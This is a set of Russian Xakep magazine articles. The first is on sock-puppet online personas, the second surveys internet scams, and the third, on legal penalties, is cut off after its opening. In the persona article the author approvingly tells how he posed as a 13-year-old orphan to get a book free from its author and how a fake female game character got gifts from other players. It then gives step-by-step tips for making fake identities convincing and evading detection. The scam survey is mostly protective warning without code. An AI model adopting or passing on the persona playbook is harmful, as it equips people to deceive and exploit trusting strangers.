Помнится, в старой доброй фидошке, году эдак в 97-ом, виртуалы были чем-то новым, а сами виртуальщики бережно заботились о своих "питомцах". Влада Ставски, Габбин, Джон Пупков, Сергей Кравец, Валя Ботева, Иван Сидорофф - своих героев страна знала наперечет. Сейчас маску надевают все, кому не лень. Достаточно зайти на любой www чат типа кроватки.ру, и там тебя встретят сотни женских ников, предлагающих развлечься в привате. Можно кричать об аморальности и падении нравов, но если разобраться - никто от этого особо не страдает. При хорошей актерской игре для окружающих разницы, кто ты есть на самом деле, нет никакой. Они просто будут воспринимать тебя как твоего героя и обращаться соответственно. В то же время игра в виртуалов - весьма увлекательна, хорошо развивает фантазию и нередко помогает разобраться в себе.


Спецвыпуск Xakep, номер #029, стр. 029-048-2, ПО ТУ СТОРОНУ МАСКИ - свежий взгляд на виртуалов

ПО ТУ СТОРОНУ МАСКИ - свежий взгляд на виртуалов

mindw0rk (mindw0rk@mail.ru)

Спецвыпуск Xakep, номер #029, стр. 029-048-2

Поводов для создания виртуала много. Одни заводят второе Я, чтобы просто позабавиться и понаблюдать за реакцией людей, другие ставят целью воспитание новой яркой личности, в руках третьих это инструмент для эффективного решения определенных задач (например, получения информации, которую при обычных условиях не достать). Наверное, всем нам порой хочется вжиться в чью-то роль, почувствовать себя актерами. Виртуальные персонажи для этого подходят как нельзя лучше. Можно стать кем угодно и, имея немножко фантазии, обыграть любые сцены. Робкие юноши превращаются в крутых мачо, интеллигенты надевают маску злостного флеймера (Добрянский, ку-ку!), мужчины чувствуют себя женщинами, женщины - мужчинами. С помощью своего протеже ты можешь высказать все, что хочешь, и вести себя, как взбредет в голову, не стесняясь знакомых, не рискуя сложившимся авторитетом. Да и просто интересно это - своими руками создавать новую жизнь.

Последнее время стало модным заселять виртуалами страницы онлайновых дневников типа livejournal.com. Причем некоторые люди настолько входят в роль, что каждый день выписывают события, происходящие с их героями, мысли, посещающие их виртуальные головы. Я даже знаю одного человека, который добросовестно публиковал подобные мемуары на протяжении двух лет! В чатах сплошь и рядом происходят случаи общения виртуалов друг с другом. Виртуал Коля Переделкин признается в любви виртуалке Лене Недоделкиной, которая, в свою очередь, благосклонна к Васе Длинностволову. Нередко всем этим виртуальным спектаклем управляет один человек, а разыгрываемые им сцены дадут фору голливудским блокбастерам.

Если отбросить всех Оль и Мань, собранных за минуту на коленке, то хозяева таких персонажей - чаще всего люди творческие. Для них жизнь в маске - способ самовыражения, возможность обыграть новые, интересные ситуации.

Виртуалы в действии

Помимо эстетического удовольствия, виртуалы могут стать незаменимым помощником в быстром решении некоторых задач. Года полтора назад я решил пощупать прелести MUDов (текстовая мультиплеерная игра) и подсел на мир Аладона. В качестве персонажа выбрал симпатичную воровку, во всех подробностях вписал ей сказочные внешние данные и отправился покорять новые земли. По законам жанра нужно было бы убивать монстров, по крохам собирать снаряжение, искать по всему белу свету приличные шмотки. Моя Асси в первый же день раскачалась необычайно быстро и поимела самые редкие вещи для своего уровня. Достаточно было определить самого мощного чара и со скорбью поведать ему о тяжелой судьбе начинающей адомщицы в таком сложном мире, как Аладон. Ессно, не без кокетства и многообещающих смайликов. В результате оставалось только разгребать принесенное добро и кучи золота от заботливого 47-уровневого чела. Через неделю хрупкая Асси стала одной из самых влиятельных фигур, имея в своем распоряжении пятерых крутейших телохранителей, готовых на все. Никто не имел ни малейшего сомнения, что воровку играет столь же привлекательная реальная девушка. Хотя соотношение парней к девушкам за последнее время значительно сократилось, мужики по-прежнему являются доминирующей интернет-расой. Молоденьких симпатичных барышень на всех не хватает, отсюда и повышенный спрос, рождающий конкуренцию, а как следствие - борьбу за внимание и благосклонность.


Спецвыпуск Xakep, номер #029, стр. 029-048-3, ПО ТУ СТОРОНУ МАСКИ - свежий взгляд на виртуалов

ПО ТУ СТОРОНУ МАСКИ - свежий взгляд на виртуалов

mindw0rk (mindw0rk@mail.ru)

Спецвыпуск Xakep, номер #029, стр. 029-048-3

Если ты считаешь, что игровые шмотки - все, на что можно рассчитывать, используя виртуала, то глубоко ошибаешься. Недавно я по всему Интернету искал одну книгу о секретах свободной журналистики (freelance writing). Лучшая в своем роде, но доступная только на amazon.com за 15$. Ввязываться в заморочки с пересылкой платежей не хотелось, да и цена за 200-страничную брошюрку для провинциального русского студента кусается, поэтому я пошел по другому пути. Узнал емейл автора книги - ею оказалась женщина средних лет, мать двоих детей - и послал ей письмо от имени маленькой девочки Оли. Мол, здравствуйте, тетенька, мне 13 лет, я из сиротского приюта, мечтаю стать журналисткой, уже даже публиковалась в местной детдомовской газетке... в Интернете вот нашла информацию про вашу книжечку и очень-очень захотела ее прочитать. Дальше шла большая просьба прислать ее в электронном виде с заверением, что при первом полученном гонораре деньги прилетят первым рейсом. Книга пришла через два дня. Многочисленным читателям, которые усмотрели в этом низость, предлагаю посмотреть на поступок с другой стороны. Тетя живет в Америке, зарабатывает приличные даже по тамошним меркам деньги. 15 долларов каши не сварят, ей намного больше удовольствия доставила мысль, что удалось помочь бедному ребенку из России (а я уж постарался, чтобы ребенок в ответном письме выглядел максимально счастливым и благодарным). Я же при минимальных затратах времени и сил получил необходимую мне вещь. Все довольны, спасибо Оле. С помощью подставных лиц можно совершать всевозможные проверки, создавать иллюзии определенного отношения к тебе людей, проворачивать сложные аферы. Правда, все это - тема уже для другой статьи.

Какие бы перспективы ни открывали перед тобой твои виртуальные персонажи, никогда не наглей и не перегибай палку. Одно дело вежливо попросить книжку, совсем другое - тысячу долларов для якобы детского садика. За второе могут реально посадить. И еще, делай все возможное, чтобы человек, который поверил в твоего виртуала и пошел ему навстречу, сам не остался в накладе.


Спецвыпуск Xakep, номер #029, стр. 029-048-4, ПО ТУ СТОРОНУ МАСКИ - свежий взгляд на виртуалов

ПО ТУ СТОРОНУ МАСКИ - свежий взгляд на виртуалов

mindw0rk (mindw0rk@mail.ru)

Спецвыпуск Xakep, номер #029, стр. 029-048-4

Обязательно поблагодари, оставь хорошие впечатления. И уж, конечно, не нужно после удавшейся аферы орать в ответ со своего реального имени: "Гы-гы, лопух, развел я тебя!" - это последнее дело.

Секреты виртуального мастерства

Обманывать людей в Интернете - очень просто. Все мы изначально предрасположены к доверию, нам легче поверить в реальность собеседника, чем как-то проверить и обличить его. Но, несмотря на это, иногда достаточно сделать один неверный шаг, сказать не то слово, и все поймут, что ты не тот, за кого себя выдаешь. А это может повлечь за собой любые последствия, вплоть до навязчивой идеи тебе жестоко отомстить. Чтобы подобного не произошло и тебя не раскусили, нужно следовать нескольким правилам.

Во-первых, ты должен четко представлять, кого играешь. Возьмем вышеупомянутую девочку Олю. Согласись, было бы странно, если бы детдомовский 13-летний ребенок писАл на блестящем английском и строил умные предложения. Но если маленькая Оленька допускает множество грамматических ошибок, излагает мысли простыми односложными фразами и горит детским энтузиазмом - это уже больше похоже на истину. Так же и в отношении любого другого персонажа. Подумай, как бы ты вел себя на его месте, постарайся его понять и войти в роль. Для этого можно вспомнить похожих риаллайфовых людей того же возраста или вообще создать новое протеже, взяв за основу одного из своих знакомых. Для большей реалистичности нужно наделить виртуала индивидуальностью. Придумай ему историю, личную жизнь, привычки, увлечения. Если ты будешь все сочинять на ходу, окружающие легко поймают тебя на несоответствиях. Чем больше у твоего героя будет жизненных черт, тем лучше. И не надо заводить имен вроде: Боря Тараканов или Андрюха Клявин. Выбирай что-то не слишком приевшееся, но и не чересчур экзотическое. Сергей Логинов, Дима Подгурский и Лена Анищенко будут в самый раз.

Так как виртуал обитает в сети, то и атрибуты должен иметь соответствующие - в обязательном порядке емейл (в отличном от твоего реального мыла домене), аська, можно даже простенькую страничку на халявном серваке сваять. Особо настороженные субъекты вроде меня при первых подозрениях кинутся проверять твоего альтер эго в сети. Чтобы убедить их в реальности персонажа, оставь несколько следов в случайных местах. Например, если ты обыгрываешь молоденькую девчушку Свету, зайди на какой-нибудь женский форум и кинь там объявление от ее имени. Что-то типа: "У меня начались месячные, посоветуйте таблетку от дискомфорта" :). Лично я ищу в первую очередь по электронному адресу (в Инете полно однофамильцев), так что позаботься о его наличие в подписи. Если виртуал появляется в том месте, где тебя хорошо знают, нужно обратить внимание на все детали. Твои смайлики, манера высказывания, слова-паразиты, приевшиеся опечатки, стиль оформления текстов (многие, к примеру, начинают все предложения с маленькой буквы) - все это может выдать тебя с головой. Более того, именно на эти мелочи будут обращать внимание твои "недруги", так как, привыкнув к одному слогу, очень сложно полностью перестроиться. Играя виртуала, постарайся в корне изменить имидж. Вместо ":)" - ";]", вместо длинных предложений - короткие, введи новые словесные опечатки (не ставь тире перед "то", "либо", "нибудь" или часто пользуйся троеточием). Иногда, как бы между прочим, вставляй в речь фразы, говорящие в пользу достоверности персонажа. Если играешь врача - оброни ненароком популярную среди медиков шутку, если ты - юная особа, дай людям понять о наличие в голове неизменных тараканов ("У меня куча парней", "Парень должен всегда платить за девушку"). Только ничего не навязывай - все должно быть уместно и проскакивать по ходу дела.


Спецвыпуск Xakep, номер #029, стр. 029-048-5, ПО ТУ СТОРОНУ МАСКИ - свежий взгляд на виртуалов

ПО ТУ СТОРОНУ МАСКИ - свежий взгляд на виртуалов

mindw0rk (mindw0rk@mail.ru)

Спецвыпуск Xakep, номер #029, стр. 029-048-5

Хорошим оружием против виртуала может стать блеф. Недавно в одном местном чате я прижал к стенке "студентку" такого-то ВУЗа заверением, что сам учусь в этом универе на том же факультете и в упор не помню фамилии Дроздова среди студенток (хотя всех, мол, знаю). Парень тут же потерялся и, бросив что-то невнятное, ретировался с канала. Не допускай таких промахов. Вполне возможно, что тебя просто проверяют на прочность, так что на любую пахнущую блефом фразу сразу давай уверенный ответ. В нашем случае вполне достаточно было: "Я учусь на заочном". Если кто-то таки выражает большое сомнение в реальности твоего персонажа - не нужно кидаться тут же доказывать ему обратное или, чего доброго, тыкать в лицо какими-то фактами. Сомневается - хрен с ним, пусть сомневается. Главное, что ты не сомневаешься в реальности своего виртуала :)

Ладно, хватит с тебя, пожалуй, советов. Заводить или не заводить виртуальное протеже - решай сам. Ничего ненормального, как кричат некоторые, в этом нет. Наоборот - если удалось создать интересную, яркую личность, обыгрывать ее доставит тебе немало увлекательных минут. Плюс, как я уже говорил, подобное времяпрепровождение неплохо развивает творческие навыки. Только не злоупотребляй виртуальными играми. Будет весьма печально, если в один прекрасный день ты, забыв выйти из роли, наденешь в риаллайфе юбочку, напомадишь губки, напудришь носик и, виляя попкой, пойдешь на дискотеку знакомиться с крутыми пацанами.


Спецвыпуск Xakep, номер #029, стр. 029-052-1, Сетевые дети лейтенанта Шмидта

Сетевые дети лейтенанта Шмидта

mindw0rk

Спецвыпуск Xakep, номер #029, стр. 029-052-1

<mindw0rk@mail.ru>

Внуки Калиостро, дети лейтенанта Шмидта, братья Лени Голубкова - они живут среди нас и с неугасающей энергией продолжают дело своих предков. С веками людская доверчивость и жажда быстрой наживы никуда не испарились - мы по прежнему мечтаем о том, чтобы отхапать много и сразу.

Тут-то "на помощь" и приходят аферюги и жулики всех мастей. Но если раньше им приходилось действовать в открытую, а жертв выуживать по улицам да по домам, с появлением Интернета аферы проворачивать стало на порядок проще. И не нужно изобретать велосипед - все уловки давно рассчитаны, продуманы, остается только пересадить их на электронную почву.

Интернет-аукционы

Аукционы в сети уже давно выросли в крупную сферу бизнеса, в которой вращаются десятки миллионов долларов. Популярность объясняется просто -

с их помощью можно легко приобрести редкие вещи, а цена на многие товары на порядок ниже, чем в магазинах. Сотни тысяч людей по всему миру ежедневно делают покупки на ebay и подобных ресурсах. Что открывает большие перспективы для разного рода махинаций.

Самым частым надувательством, на которое жалуются пользователи аукциона, - банальное кидалово с отсылкой товара. Ты находишь интересующий тебя товар по приемлемой цене, принимаешь участие в торгах, вроде как выигрываешь. Теперь остается переслать деньги продавцу и, как только он их получит, ждать покупку. Но через месяц ты понимаешь, что никто ничего высылать не собирается, а напоминания и угрозы по емейлу остаются без ответа.

Все знают пословицу: "Каждая бабка свои семечки хвалит". Так и здесь - чтобы привлечь потенциальных покупателей, особо хитрые индивиды "немного" приукрашают описания выставляемых товаров. На бумаге оно все красиво и привлекательно, а приходит - рухлядь, место которой на свалке. Часто мошенники отправляют бракованные вещи или даже полностью непригодные, выдавая их за новье. Другой вариант - продажа пиратского софта по цене лицензионного. Многократное повышение цены может составить автограф звезды на коробке с музыкальным диском. Счастливый покупатель часто не подозревает, что подпись подделана.

Но даже если товар блистает новизной и оправдал все твои ожидания - не спеши обмывать удачную покупку. Вполне возможно, завтра к тебе в дверь постучат сотрудники органов и, надев на руки браслеты, отведут на новую квартиру. Дело в том, что выставляемый товар аферист может и не иметь, а заказать на твой адрес по украденной кредитке в одном из интернет-магазинов. И когда это раскроется, попробуй доказать, что это не ты делал заказ.

Не только покупатели рискуют остаться с носом, на честных продавцов тоже находится управа. Часто, получив чек или номер кредитки, люди откладывают обналичивание на потом, а товар высылают сразу. В итоге оказывается, что денег на счету нет или чек просто подделан.

Немало умельцев пользуются аукционом как бесплатной арендой. Продаешь ты такому, допустим, видеокамеру. Все вроде нормально - деньги получил, товар отослал. Но через месяц приходит письмо, мол, камера - с дефектом, примите обратно. И остаешься ты без денег, да с поломанной вещью, что обычно списывается на повреждения при пересылке.


Спецвыпуск Xakep, номер #029, стр. 029-052-2, Сетевые дети лейтенанта Шмидта

Сетевые дети лейтенанта Шмидта

mindw0rk

Спецвыпуск Xakep, номер #029, стр. 029-052-2

Так как интернет-аукцион, по сути, не отличается от обычного, задачи у обеих сторон всем известные: покупателю - подешевле купить, продавцу - подороже продать. Чтобы сбить цену, некоторые участники торгов пользуются не совсем честными уловками. С целью отпугнуть конкурентов они сразу же резко повышают ставку и держат ее такой до самого закрытия. А в конце - просто снимают первоначальное предложение и получают товар за копейки.

Лучший способ избежать попадания впросак - иметь дело с проверенными людьми. На всех более-менее крупных интернет-аукционах ведется рейтинг каждого продавца, составленный на основе отзывов покупателей. Если его хистори девственно чиста, лучше не рискуй - дороже выйдет. Но если у продавца хороший рейтинг и большой опыт продаж - причин для беспокойства, скорее всего, нет. Обязательно спроси реальные координаты - адрес и телефон, которые нужно сразу проверить. Если продавец (покупатель) откажется предоставить что-либо кроме емейла - это уже повод задуматься, может ему действительно есть что скрывать.

На вершине пирамиды

"Поздравляем! Вы только что получили письмо, которое поможет вам полностью изменить свою жизнь. Вы хотите в течение следующего месяца получить первые 10 тысяч долларов, а через полгода - до 50 миллионов? Это реально! Многие люди уже купаются в деньгах, не прилагая к этому больших усилий. Наша система сделает вас миллионером всего за несколько месяцев. И все, что для этого нужно..."

А нужно для этого немного - всего лишь выслать по указанному адресу немного денег (5-20$) и следовать инструкциям, привлекая новых простаков.

С начала 90-х, когда Инет только начинал свои первые шаги, сетевой маркетинг много раз менял форму. Сначала по свету путешествовало "письмо счастья", затем мир узнал про МММ, в наши дни передовых технологий вовсю юзается баннерная реклама. Но суть везде одна - в погоне за обещанными миллионами заманивать в сети все новых и новых людей. Причем Интернет подходит для этой цели идеально - с помощью программ массовой рассылки сообщений можно за пару секунд донести "выгодное предложение" миллионам.

Хотя в России уже прошел спонсорский бум, многие люди по-прежнему регистрируются на сайтах Spedia, AllPaidFor, ValuePay, Alladvantage и проводят по несколько часов в день, кликая на баннеры, заполняя формы и мечтая о легких деньгах. Лет 5 назад некоторые фирмы высылали чеки исправно, сейчас же абсолютное большинство спонсорских проектов не стоит ни гроша. Меня удивляют чудаки, которые не получают ни копейки в течение нескольких месяцев, и все равно продолжают работать на "спонсора". В то же время сами конторы имеют стабильную финансовую поддержку рекламируемых компаний.

Есть, конечно, и честные конторы, которые деньги высылают. Но тарифы у таких настолько мизерные, что приходится конкретно пахать, чтобы заработать хотя бы 50$. И, главное, ради чего все это? Неужели интересно проводить время, тыкая в одни и те же баннеры или заполняя скучные формы?


Спецвыпуск Xakep, номер #029, стр. 029-052-3, Сетевые дети лейтенанта Шмидта

Сетевые дети лейтенанта Шмидта

mindw0rk

Спецвыпуск Xakep, номер #029, стр. 029-052-3

Нигерийские письмена

В 1998 г. я чуть было не помог бедному нигерийскому гражданину Рахату, отца которого расстреляли злые враги, вывезти из страны наследство в 15 миллионов долларов. Рахат обратился ко мне со слезной просьбой, уверяя, что просто так ему это сделать не дадут, что лучший выход - положить деньги на мой счет в банке с дальнейшей пересылкой в безопасное место. Щедрый Рахат пообещал за это 20 процентов. Три миллиона долларов! Неплохо за скромную услугу далекому чужеземному другу. Когда я выразил готовность всячески посодействовать благородной цели, Рахат выслал все необходимые документы, подтверждающие условия нашего договора. От меня, помимо получения денег, требовалось только открыть счет в названном банке, куда нигерийский наследник попросил переправить свои миллионы. Проблема была только в том, что открытие счета стоило тысячу долларов, которые предлагалось выслать в указанном направлении. Рахат немного не рассчитал с помощником - у меня в то время не то что тысячи - десяти долларов не было. Поэтому не получилось мне быстро и на халяву разбогатеть, а зажиточному нигерийцу - обеспечить безопасное путешествие своего состояния на новую родину.

Только спустя несколько лет я узнал, что таких наследников по белу свету - как кур нерезаных. И у всех одна и та же проблема - слишком много миллионов, не с кем поделиться. "Нигерийские письма", или, как их еще называют, "обман 419" (число 419 - номер соответствующей статьи уголовного кодекса Нигерии), известны во всем мире. По подсчетам американской программы "Internet Fraud Watch", со времени появления аферы доход африканских мошенников составил более ста миллионов долларов. И эта цифра с каждым годом растет.

Несмотря на то, что в России эта напасть не так распространена, никто не застрахован от "конфиденциальных деловых предложений". Поэтому, если к тебе обратится несчастная вдова или нигерийский банкир, предлагающие большие проценты с жутких денег, не подсчитывай, куда потратить свалившиеся на голову миллионы. Просто удали письмо от греха подальше.

Звонок на вес золота

Ты наверняка знаешь про службы "секс по телефону". Стоит это сомнительное удовольствие ни много ни мало - от трех баксов за минуту. Такая система оплаты называется "pay-per-call". Телефонные компании предоставляют любому желающему возможность зарегистрировать телефонный номер в специальной региональной зоне. Особенность тут в том, что все поступающие звонки оплачиваются по высокому тарифу, а деньги за них уходят зарегистрировавшему номер челу. Например, звонок на номер, начинающийся на 809, будет стоить примерно 20$ в минуту! Создавался такой сервис в основном для проведения коммерческих консультаций. Но сообразительные аферисты приспособили его для своих целей.

В 97-98 гг. в США началась просто эпидемия писем, предлагавших по той или иной причине позвонить по заветному номеру. В ход шли даже такие грязные методы, как извещение о смерти родственника (чтобы узнать более подробную информацию, нужно было позвонить по оставленному номеру).


Спецвыпуск Xakep, номер #029, стр. 029-052-4, Сетевые дети лейтенанта Шмидта

Сетевые дети лейтенанта Шмидта

mindw0rk

Спецвыпуск Xakep, номер #029, стр. 029-052-4

В Интернете только для этой цели живут тысячи страничек. С виду - обычные коммерческие порносайты. Отличие лишь в том, что пароль к фотографиям администратор готов назвать, но только по телефону.

Нередко на указанном номере действительно сидит человек. Задача его - как можно дольше продержать "клиента" на линии. Он может заикаться, выражать непонимание, просить подождать какое-то время. Но чаще всего организаторы аферы не заморачиваются и просто записывают длинное сообщение на автоответчик. Узнав, что родственник жив, а картинки на сайте - лажа, человек обычно о происшествии забывает. И вспоминает только когда ему приходит трехзначный счет за переговоры.

Запоминать зловещие номера бесполезно. В мире много таких сервисов и все время появляются новые. Поэтому совет тут может быть один - никогда не звони по номеру, присланному незнакомцем. Что бы он там ни говорил.

Киберсквоттеры атакуют

Если ты владелец популярного ресурса, если ты чем-то знаменит или у тебя просто много денег, поздравляю, ты - потенциальная жертва киберсквоттеров. Этим замысловатым словом называют людей, захватывающих доменные имена с целью получения выкупа. Причем во многих случаях подобный вид заработка хоть и попахивает грязью, но по закону легален.

Наверное, самым распространенным вариантом киберсквоттинга является захват перспективных доменов и перевод их в режим "for sale". Многие пользователи ищут ресурсы на интересующие темы, вводя в окне браузера соответствующие имена сайтов. Если человек ищет книги, то, скорее всего, он наберет поочередно: library.com, books.com, booksarchive.com и literature.org. Чем выше будет стоять домен в статистике случайного набора, тем ценнее он для организации и тем выше будет его цена. Иногда крупные компании готовы заплатить просто космические деньги за обладание конкретным доменным именем. Например, Wine.com был куплен за 3 миллиона долларов, Loans.com - за 4 миллиона, Business.com обошелся новым владельцам в 7.5 миллионов долларов! А ведь регистрация стоит всего несколько баксов. Конечно, все самые перспективные имена уже разобраны, но остается еще море потенциально ценных для сетевых проектов или компаний с аналогичным названием.

Первый метод плох тем, что, заплатив деньги за регистрацию, приходится ждать, когда твоим сайтом заинтересуются. Тут от сквоттера мало что зависит, не будешь же предлагать его всем кому ни попадя. Но есть и другой вариант. Киберсквоттер захватывает домен, в котором фигурируют название города или инициалы известного человека и превращает сайт в рассадник порнографии или чего-то аморального. Понятное дело, если юзер зайдет на VladimirPutin.ru и найдет там коллекцию педофилических картинок, Владимиру Владимировичу это авторитета не прибавит. Да и городу тоже, если имя сайта - что-то типа petersburg.ru. Сделав свое грязное дело, сквоттер выходит на связь с заинтересованным лицом и скромненько так предлагает: "Заплатите мне деньги, и я избавлю вас от этого ужаса". Так как для многих людей и организаций репутация дороже пары тысяч баксов, им приходится идти навстречу ультиматуму.


Спецвыпуск Xakep, номер #029, стр. 029-052-5, Сетевые дети лейтенанта Шмидта

Сетевые дети лейтенанта Шмидта

mindw0rk

Спецвыпуск Xakep, номер #029, стр. 029-052-5

Самым опасным и дорогостоящим может стать захват домена, когда заканчивается срок его регистрации. В этом случае сквоттер может перехватить управление сайтом, внеся плату за домен первым. И тогда проект, который взращивался годами, кровью и потом завоевывал популярность, окажется в руках какого-то пройдохи. Захватчик, конечно же, попросит денег, и сумма будет во многом зависеть от популярности сайта.

Работенка кому?

Последнее время во всем мире большой популярностью пользуется вид работы Freelance. Не нужно ежедневно ездить в контору, выслушивать наставления начальника, выполнять скучные задания. В фриленсе ты сам себе начальник - можешь работать, как хочешь, когда хочешь и с кем хочешь. Вся работа делается на дому и, когда будет готова, переправляется работодателю по Интернету. Он, в свою очередь, высылает оплату через банк. Таким образом, можно получить приличные даже по американским меркам деньги, проживая в Богом забытой украинской деревушке. Правда, фриленс пригоден только для творческих профессий, таких как: переводчик, журналист, программист или компьютерный художник. С одной стороны, это очень удобно, с другой - рискованно. В сети полно сайтов с объявлениями категории "требуются". Перебрав несколько десятков вариантов, можно найти для себя очень перспективную работенку. И вот ты уже заключил с работодателем договор, трудишься в поте лица, подсчитывая прибыль. Но когда отсылаешь готовую работу, понимаешь, что платить на самом деле тебе никто не собирается. Ты даже не в состоянии отстоять свои права, так как фирма может находиться на другом краю Земли.

К другому способу даже подкопаться нельзя. Допустим, ты переводчик и ищешь в Инете хорошо оплачиваемую работу. Рано или поздно, просматривая сайты типа job.ru, натыкаешься на объявление: "Приглашаются переводчики с русского на английский для перевода технических текстов. Оплата - 7$/Кб. Аванс". Условия вроде неплохие, но когда ты связываешься с работодателем, тебе говорят, что набор осуществляется на конкурсной основе и, чтобы продемонстрировать свои навыки, нужно пройти тест. Затем приходит кусок текста, который предлагается перевести. Если справишься - берем, нет - "звиняйте, бананив нэма". Стоит ли говорить, что, выполнив задание, сколь бы ни идеально, ты получишь в ответ только сообщение, что не прошел по конкурсу. С помощью такой нехитрой уловки мошенники могут за несколько дней бесплатно получить перевод большого объема информации или выбрать из сотен присланных работ лучшую.

Предотвратить такое кидалово сложно - вокруг много компаний, которые действительно нуждаются в квалифицированных работниках и готовы платить за труды реальные деньги. Я бы посоветовал не связываться, если тестовое задание превышает время выполнения 20 минут. Лучшую гарантию даст авторитет компании. Вряд ли такие монстры, как Microsoft, Samsung или журнал "New York Times" будут экономить копейку, рискуя репутацией. Если ты имеешь дело с неизвестной конторой, постарайся собрать о ней все возможные сведения. В первую очередь - адрес и телефон. В Интернете, кстати, ведутся черные списки недобросовестных работодателей. Посмотри - может твоя фирма там находится в первых рядах.


Спецвыпуск Xakep, номер #029, стр. 029-052-6, Сетевые дети лейтенанта Шмидта

Сетевые дети лейтенанта Шмидта

mindw0rk

Спецвыпуск Xakep, номер #029, стр. 029-052-6

Кредитные невзгоды

В середине 90-х тысячи американцев обеспечили наших соотечественников ноутбуками, хорошей аппаратурой, платными сервисами и другими благами цивилизации. В это время значительная часть интернет-населения России болела золотой лихорадкой на почве кредитных карт. Люди нашли способ заказывать на халяву разное добро и пользовались им на полную катушку. А способ этот назывался "Credit Card Generator". Нажать на кнопку, вписать полученный номер в форму заказа ешопа и отправить - все дела. Всего за несколько месяцев Россия завоевала такую репутацию, что большинство онлайновых магазинов просто перестали принимать заказы из стран СНГ. Несмотря на новые способы защиты и обязательные подтверждения, обладая определенными знаниями и имея валидные номера кредитных карт, можно легко снять с них деньги или приобрести дорогостоящую покупку. Распространенным способом сбора номеров кредиток является создание подставного онлайнового магазина или порносайта. Доверчивые посетители вводят конфиденциальные данные, и они тут же попадают в лапы мошенников. Обычно реклама таких сайтов зашкаливает по степени оптимизма: "Самые выгодные покупки в Интернете!", "Хотите крутой ноутбук за 300$?", "У нас самые откровенные фотографии голых женщин!", "300 гиг эротических картинок и видео", "Голые Бритни Спирс и Анна Курникова!". На липовых порносайтах часто фоток нет вообще (или несколько низкого качества), ведь главная цель - не развлекать посетителей, а банально своровать номера.

Правда, большинство людей уже успели кое-чему научиться и совершают покупки на крупных, зарекомендовавших себя порталах. Но и тут аферисты нашли выход. Так как определенный процент пользователей попадает на ешоп по ссылке баннера, мошенники вставляют несколько таких баннеров на дружественные сайты. Фишка в том, что на баннере только написано название портала. На самом деле переадресация идет на левый сайт, где тебя уже ждет хитрый Ява-скрипт, который пишет в адресной строке браузера что-то типа: "porta.ru" или "amazon.com", а в окне изображает точную копию ресурса. И если ты, решив сделать покупку, введешь номер карты, она отправится не к работникам ешопа, а к автору скрипта.

Все еще актуальной остается социальная инженерия, с помощью которой вполне реально развести жертву. Мошенник может позвонить и, представившись работником банка, спросить, действительно ли с этого счета такого-то числа была сделана покупка на крупную сумму. Хозяин кредитки, естественно, заверит, что ничего подобного он не заказывал. И, по просьбе звонящего "банкира", продиктует "для проверки" и номер кредитки, и свои инициалы - все что угодно, только бы недоразумение утряслось.

Инет на халяву

Халява для русского человека - вообще слово необычайно близкое и родное. Но халява на доступ в Интернет притягательна вдвойне. Хотя всемирная паутина и набирает у нас километровые обороты, об американских тарифах (20$ в месяц за качественный неограниченный доступ) нам пока еще остается только мечтать. Но потомство товарища Шмидта и тут не оставило нас в беде. На рыночных столбах, интернет-форумах и прочих людных местах нередко можно заметить объявления: "Продам анлим на Интернет. ДЕШЕВО!". Кому ж не хочется анлим, да еще и дешево? Связавшись с автором сообщения, ты узнаешь, что цена действительно дешевле официальной. И платишь деньги, пока тот не передумал. Концовок этой истории может быть несколько.


Спецвыпуск Xakep, номер #029, стр. 029-052-7, Сетевые дети лейтенанта Шмидта

Сетевые дети лейтенанта Шмидта

mindw0rk

Спецвыпуск Xakep, номер #029, стр. 029-052-7

Ты подключаешься по купленному логину и... как ни странно, все в порядке. Коннект - зверь, доступ - полный. Но радость заканчивается на следующий день, когда сервер начинает выдавать "Password error". А твой логин с измененным паролем уходит следующему клиенту. Или аферист просто продает аккаунт нескольким (десяткам) юзерам одновременно. И тогда твоей любимой игрой станет: "Дозвонись до провайдера" с призом в виде обретенного, наконец, доступа (до первого обрыва).

Некоторые веселые и находчивые индивиды проводят себе по дешевке несколько телефонных линий и соединяют их в модемный пул. Один номер постоянно висит в Интернете, другие к нему подключены и принимают часть трафика на себя. Можешь сам представить, какая будет скорость соединения, если 56K разделить между 6-10 пользователями. Но доморощенного провайдера это нисколько не смущает, и он дерет с тебя денежки, указывая на хреновую телефонную линию.

Но черт с ним, с коннектом. Случается и так, что тебе просто впаривают стыренный трояном почасовой аккаунт. И тогда, если хозяин логина прибежит в контору ISP и пожалуется на свою захаканность, след приведет не к злодею-продавцу, а прямиком под твою дверь.

Я перечислил лишь несколько наиболее распространенных способов - на самом деле их намного больше. Онлайновые казино, сетевые инвестиции, авансовые займы, хищение идентификации, турпутевки через Интернет... список можно продолжать долго. Универсального совета, который поможет избежать всех неприятностей, нет. Уместной тут будет фраза: "Если тебе кажется - это слишком хорошо, чтобы быть правдой, скорее всего, так оно и есть". Не верь рассказам про быстрое обогащение, не ведись на "выгодные предложения", не думай, что благородные люди вот так просто придут и поделятся с тобой своими финансами. И каждый раз получая письмо из далекой Нигерии или от Билла Гейтса, поразмысли, почему связались именно с тобой. Может быть у тебя просто слишком много денег?


Спецвыпуск Xakep, номер #029, стр. 029-058-1, ПРЕСТУПЛЕНИЕ И НАКАЗАНИЕ - что бывает за веб-мошенничество

ПРЕСТУПЛЕНИЕ И НАКАЗАНИЕ - что бывает за веб-мошенничество

TanaT (tanat@hotmail.ru)

Спецвыпуск Xakep, номер #029, стр. 029-058-1

Весь этот выпуск посвящен махинациям и надувательствам в Сети. Тут тебе и трояны, и дефейсы, и хакинг, и фрикинг, и вирусы-папирусы... Но пришло время поговорить, как мужчина с мужчиной. Ты уже взрослый и имеешь право знать, что с тобой сделают, если поймают.

Начнем мы с того, что разберемся, кто тебя будет искать, если ты совершишь уголовно наказуемое деяние. Что это за кулебяка такая, мы поговорим чуть позже. Итак, искать тебя будут ФСБ и МВД. Наиболее опасной ищейкой является ФСБ, так как она расследует самые хитрые и интересные преступления. Что же до МВД, то они должны следить за тем, чтобы никто нигде не продавал пиратские CD диски :). Также милиция оказывает помощь федералам при поиске и задержании правонарушителя.

Думаю, ты не раз слышал об отделе «Р», или «П», который входит в состав ФСБ и может «поймать любого, если захочет». Я не скажу тебе, как действительно называется это подразделение, потому как не знаю сам. Суть в том, что отдел переименовывался несколько раз, и я предпочитаю промолчать, чем соврать. Одно же очевидно точно: отдел есть и иногда он выходит на охоту.

Что же такое нужно совершить, чтобы выманить зверя из берлоги? Вернее, чего лучше не делать, чтобы не столкнуться с хищником ночью? Вот мы и подошли к юридическим проволочкам - что такое хорошо и что такое плохо. Сильно грузить тебя не буду - не на юрфаке в конце концов, - а вот законы перескажу.

